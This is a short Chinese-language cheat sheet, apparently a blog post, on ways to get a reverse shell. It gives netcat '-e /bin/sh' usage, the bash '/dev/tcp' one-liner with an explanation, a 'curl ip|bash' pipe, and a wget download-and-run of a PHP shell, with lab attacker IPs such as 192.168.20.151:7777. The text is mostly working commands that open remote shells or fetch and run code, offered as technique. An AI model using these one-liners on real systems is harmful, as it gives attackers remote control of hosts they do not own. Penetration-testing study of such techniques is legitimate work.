监听,弹弹弹
反弹shell姿势
netcat 一句话反弹
获取shell
(想反弹谁的shell
就在谁的后面加-e /bin/sh
或-e /bin/bash
)
正向shell
客户端主动连接服务器并获取服务器shell
1 | 客户端主动连接并得到反弹shell |
反向shell
服务器端连接并反弹shell
给客户端
1 | 客户端监听 |
bash反弹shell
1 | bash -i >& /dev/tcp/我们靶机ip/我们靶机 port 0>&1 |
bash
一句话命令详解
以下针对常用的bash
反弹一句话进行了拆分说明,具体内容如下
其实以上bash反弹一句完整的解读过程就是:
bash产生了一个交互环境与本地主机主动发起与目标主机8080
端口建立的连接(即TCP 8080 会话连接)相结合,然后在重定向个tcp 8080
会话连接,最后将用户键盘输入与用户标准输出相结合再次重定向给一个标准的输出,即得到一个bash反弹环境。
在反弹shell
时要借助netcat
工具反弹
curl反弹shell
前提要利用bash
一句话的情况下使用curl
反弹shell
在存在命令执行
的服务器上执行
1 | curl [自己的服务器]ip|bash |
该ip
的index
文件上含有bash
一句话,就可以反弹shell
。
例如在自己的服务器index文件
上写上一句话
1 | bash -i >& /dev/tcp/192.168.20.151/7777 0>&1 |
192.168.20.151
就是作为监听端口的服务器【攻击机】用来得到反弹的shell。
存在一句话,利用curl
反弹。kali
开启监听
wget
方式反弹shell
利用wget
进行下载执行
1 | wget 192.168.20.130/shell.txt -O /tmp/x.php && php /tmp/x.php |
利用下面贴出的php
进行反弹。
开启监听